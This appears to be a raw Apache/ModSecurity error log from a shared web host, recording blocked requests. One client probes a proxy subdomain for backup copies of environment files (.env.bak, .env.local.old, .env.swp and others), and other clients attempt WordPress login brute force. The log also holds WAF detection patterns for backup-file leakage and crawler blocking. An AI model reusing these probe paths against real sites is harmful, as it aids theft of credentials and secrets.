[Tue May 26 19:05:09.784767 2026] [security2:error] [pid 6038:tid 6273] [client 208.84.100.247:24908] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.local~"] [unique_id "ahWhjVHA3ZmGrHHEr4qUuAAAAO4"]
[Tue May 26 19:05:09.784873 2026] [security2:error] [pid 6038:tid 6200] [client 208.84.100.247:24890] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.local.backup"] [unique_id "ahWhjVHA3ZmGrHHEr4qUuQAAAKU"]
[Tue May 26 19:05:09.785065 2026] [security2:error] [pid 6038:tid 6278] [client 208.84.100.247:24876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.local.old"] [unique_id "ahWhjVHA3ZmGrHHEr4qUuwAAAPM"]
[Tue May 26 19:05:09.785284 2026] [security2:error] [pid 6038:tid 6248] [client 208.84.100.247:24874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.local.bak"] [unique_id "ahWhjVHA3ZmGrHHEr4qUvAAAANU"]
[Tue May 26 19:05:09.785703 2026] [security2:error] [pid 6038:tid 6266] [client 208.84.100.247:24870] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.copy"] [unique_id "ahWhjVHA3ZmGrHHEr4qUugAAAOc"]
[Tue May 26 19:05:09.786295 2026] [proxy:error] [pid 6038:tid 6233] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.786352 2026] [proxy_http:error] [pid 6038:tid 6233] [client 208.84.100.247:24836] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.786671 2026] [proxy:error] [pid 6038:tid 6276] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.786727 2026] [proxy_http:error] [pid 6038:tid 6276] [client 208.84.100.247:24528] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.786938 2026] [proxy:error] [pid 6038:tid 6233] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.786973 2026] [proxy_http:error] [pid 6038:tid 6233] [client 208.84.100.247:24836] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.787392 2026] [proxy:error] [pid 6038:tid 6276] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.787430 2026] [proxy_http:error] [pid 6038:tid 6276] [client 208.84.100.247:24528] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.787727 2026] [security2:error] [pid 6038:tid 6187] [client 208.84.100.247:24838] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env~"] [unique_id "ahWhjVHA3ZmGrHHEr4qUwAAAAJg"]
[Tue May 26 19:05:09.788299 2026] [security2:error] [pid 6038:tid 6277] [client 208.84.100.247:24844] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.swp"] [unique_id "ahWhjVHA3ZmGrHHEr4qUvQAAAPI"]
[Tue May 26 19:05:09.789273 2026] [security2:error] [pid 6038:tid 6194] [client 208.84.100.247:24820] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.old"] [unique_id "ahWhjVHA3ZmGrHHEr4qUwgAAAJ8"]
[Tue May 26 19:05:09.789565 2026] [proxy:error] [pid 6038:tid 6228] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.789616 2026] [proxy_http:error] [pid 6038:tid 6228] [client 208.84.100.247:24782] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.790198 2026] [proxy:error] [pid 6038:tid 6228] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.790259 2026] [proxy_http:error] [pid 6038:tid 6228] [client 208.84.100.247:24782] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.790291 2026] [security2:error] [pid 6038:tid 6245] [client 208.84.100.247:24806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.bak"] [unique_id "ahWhjVHA3ZmGrHHEr4qUxAAAANI"]
[Tue May 26 19:05:09.791869 2026] [security2:error] [pid 6038:tid 6269] [client 208.84.100.247:24822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.backup"] [unique_id "ahWhjVHA3ZmGrHHEr4qUwwAAAOo"]
[Tue May 26 19:05:09.791993 2026] [proxy:error] [pid 6038:tid 6198] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.792039 2026] [proxy_http:error] [pid 6038:tid 6198] [client 208.84.100.247:24796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.792357 2026] [security2:error] [pid 6038:tid 6222] [client 208.84.100.247:24994] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcontacts.kmmc.co.in"] [uri "/___proxy_subdomain_cpcontacts/.env.production~"] [unique_id "ahWhjVHA3ZmGrHHEr4qUxgAAALs"]
[Tue May 26 19:05:09.792616 2026] [proxy:error] [pid 6038:tid 6198] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.792661 2026] [proxy_http:error] [pid 6038:tid 6198] [client 208.84.100.247:24796] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.793096 2026] [proxy:error] [pid 6038:tid 6288] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.793156 2026] [proxy_http:error] [pid 6038:tid 6288] [client 208.84.100.247:24790] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:09.793750 2026] [proxy:error] [pid 6038:tid 6288] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:09.793785 2026] [proxy_http:error] [pid 6038:tid 6288] [client 208.84.100.247:24790] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:10.169227 2026] [proxy:error] [pid 6038:tid 6261] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:10.169288 2026] [proxy_http:error] [pid 6038:tid 6261] [client 208.84.100.247:24908] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:10.169876 2026] [proxy:error] [pid 6038:tid 6261] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:05:10.169909 2026] [proxy_http:error] [pid 6038:tid 6261] [client 208.84.100.247:24908] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 19:05:10.883776 2026] [security2:error] [pid 6038:tid 6171] [client 195.2.84.198:54599] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.84.2.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWhjlHA3ZmGrHHEr4qU5wAAAIg"], referer: https://www.glorodrc.com/index.php?route=product/category&path=97
[Tue May 26 19:05:11.031168 2026] [security2:error] [pid 6038:tid 6045] [remote 154.66.198.148:27118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhjlHA3ZmGrHHEr4qU5gAA-wY"]
[Tue May 26 19:05:11.842840 2026] [security2:error] [pid 6038:tid 6264] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhj1HA3ZmGrHHEr4qU9gAAAOU"]
[Tue May 26 19:05:12.177293 2026] [security2:error] [pid 6038:tid 6053] [remote 92.205.109.21:44010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhj1HA3ZmGrHHEr4qVAwAA2g4"]
[Tue May 26 19:05:12.790991 2026] [security2:error] [pid 6038:tid 6057] [remote 92.205.109.21:44010] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhkFHA3ZmGrHHEr4qVFQAA3RI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:05:14.135659 2026] [security2:error] [pid 6038:tid 6198] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhkVHA3ZmGrHHEr4qVMAAAAKM"]
[Tue May 26 19:05:15.084267 2026] [security2:error] [pid 6038:tid 6295] [client 195.2.84.198:59300] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahWhk1HA3ZmGrHHEr4qVUwAAAQQ"], referer: https://www.glorodrc.com/index.php?route=information/contact
[Tue May 26 19:05:16.214029 2026] [security2:error] [pid 6038:tid 6252] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhk1HA3ZmGrHHEr4qVYgAAANk"]
[Tue May 26 19:05:16.754315 2026] [security2:error] [pid 6038:tid 6168] [client 114.119.145.237:28323] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.traderscafe.in"] [uri "/webinars/febinars/tradezilla-2"] [unique_id "ahWhlFHA3ZmGrHHEr4qVfgAAAIU"], referer: https://www.traderscafe.in/webinars/febinars/tradezilla-2
[Tue May 26 19:05:17.690737 2026] [security2:error] [pid 6038:tid 6065] [remote 91.227.122.219:32858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 219.122.227.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWhlVHA3ZmGrHHEr4qVmAAAiRo"]
[Tue May 26 19:05:18.298440 2026] [security2:error] [pid 6038:tid 6175] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhlVHA3ZmGrHHEr4qVpAAAAIw"]
[Tue May 26 19:05:18.339850 2026] [security2:error] [pid 6038:tid 6074] [remote 149.18.50.19:36734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 19.50.18.149.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhllHA3ZmGrHHEr4qVqwABASM"]
[Tue May 26 19:05:20.449717 2026] [security2:error] [pid 6038:tid 6290] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhmFHA3ZmGrHHEr4qV0AAAAP8"]
[Tue May 26 19:05:21.017511 2026] [security2:error] [pid 6038:tid 6078] [remote 157.20.215.193:40352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 193.215.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhmFHA3ZmGrHHEr4qV7gAA8Sc"]
[Tue May 26 19:05:21.325669 2026] [security2:error] [pid 6038:tid 6082] [remote 160.250.186.220:55114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWhmVHA3ZmGrHHEr4qV-QABASs"]
[Tue May 26 19:05:22.046656 2026] [security2:error] [pid 6038:tid 6221] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhmVHA3ZmGrHHEr4qWBQAAALo"]
[Tue May 26 19:05:24.630848 2026] [security2:error] [pid 6038:tid 6184] [client 37.59.204.134:39706] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "blettclms.com"] [uri "/robots.txt"] [unique_id "ahWhnFHA3ZmGrHHEr4qWVQAAAJU"]
[Tue May 26 19:05:24.630995 2026] [security2:error] [pid 6038:tid 6184] [client 37.59.204.134:39706] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "blettclms.com"] [uri "/robots.txt"] [unique_id "ahWhnFHA3ZmGrHHEr4qWVQAAAJU"]
[Tue May 26 19:05:24.683215 2026] [security2:error] [pid 6038:tid 6295] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhnFHA3ZmGrHHEr4qWSgAAAQQ"]
[Tue May 26 19:05:25.989485 2026] [security2:error] [pid 6038:tid 6265] [client 148.113.128.41:48274] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "blettclms.com"] [uri "/"] [unique_id "ahWhnVHA3ZmGrHHEr4qWdQAAAOY"]
[Tue May 26 19:05:25.989593 2026] [security2:error] [pid 6038:tid 6265] [client 148.113.128.41:48274] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "blettclms.com"] [uri "/"] [unique_id "ahWhnVHA3ZmGrHHEr4qWdQAAAOY"]
[Tue May 26 19:05:26.668574 2026] [fcgid:warn] [pid 6038:tid 6202] (70014)End of file found: [client 66.132.172.201:43538] mod_fcgid: can't get data from http client
[Tue May 26 19:05:27.248210 2026] [security2:error] [pid 6038:tid 6206] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhnlHA3ZmGrHHEr4qWjQAAAKs"]
[Tue May 26 19:05:27.699987 2026] [security2:error] [pid 6038:tid 6288] [client 185.191.171.15:28322] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahWhn1HA3ZmGrHHEr4qWpAAAAP0"]
[Tue May 26 19:05:27.700141 2026] [security2:error] [pid 6038:tid 6288] [client 185.191.171.15:28322] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahWhn1HA3ZmGrHHEr4qWpAAAAP0"]
[Tue May 26 19:05:29.071054 2026] [security2:error] [pid 6038:tid 6293] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhoFHA3ZmGrHHEr4qWuwAAAQI"]
[Tue May 26 19:05:29.379211 2026] [security2:error] [pid 6038:tid 6280] [client 14.186.222.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhoFHA3ZmGrHHEr4qWwQAAAPU"]
[Tue May 26 19:05:29.512583 2026] [security2:error] [pid 6038:tid 6125] [remote 91.134.89.60:53386] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWhoVHA3ZmGrHHEr4qWzAAAu1Y"]
[Tue May 26 19:05:30.017259 2026] [fcgid:warn] [pid 6038:tid 6218] (70014)End of file found: [client 66.132.195.88:24092] mod_fcgid: can't get data from http client
[Tue May 26 19:05:30.420019 2026] [security2:error] [pid 6038:tid 6106] [remote 162.214.184.71:52798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWholHA3ZmGrHHEr4qW4wAA80M"]
[Tue May 26 19:05:31.072676 2026] [security2:error] [pid 6038:tid 6197] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWholHA3ZmGrHHEr4qW6QAAAKI"]
[Tue May 26 19:05:31.178533 2026] [security2:error] [pid 6038:tid 6117] [remote 5.78.119.122:51270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahWholHA3ZmGrHHEr4qW8wAAnk4"]
[Tue May 26 19:05:31.362844 2026] [security2:error] [pid 6038:tid 6114] [remote 162.214.184.71:52798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 71.184.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWho1HA3ZmGrHHEr4qXAAAAr0s"], referer: https://yourstorybag.com/wp-login.php
[Tue May 26 19:05:31.945691 2026] [security2:error] [pid 6038:tid 6118] [remote 78.142.18.172:42240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWho1HA3ZmGrHHEr4qXCgAAoU8"]
[Tue May 26 19:05:32.628905 2026] [security2:error] [pid 6038:tid 6148] [remote 78.142.18.172:42240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 172.18.142.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWhpFHA3ZmGrHHEr4qXGAAAyW0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:05:33.443282 2026] [security2:error] [pid 6038:tid 6268] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhpVHA3ZmGrHHEr4qXJgAAAOk"]
[Tue May 26 19:05:34.486418 2026] [security2:error] [pid 6038:tid 6194] [client 74.7.175.168:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWhpVHA3ZmGrHHEr4qXLgAAAJ8"]
[Tue May 26 19:05:34.514768 2026] [security2:error] [pid 6038:tid 6179] [client 74.7.175.168:51726] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "anujtradingco.com"] [uri "/robots.txt"] [unique_id "ahWhpVHA3ZmGrHHEr4qXLAAAkFI"]
[Tue May 26 19:05:35.660675 2026] [security2:error] [pid 6038:tid 6229] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWhp1HA3ZmGrHHEr4qXYQAAAMI"]
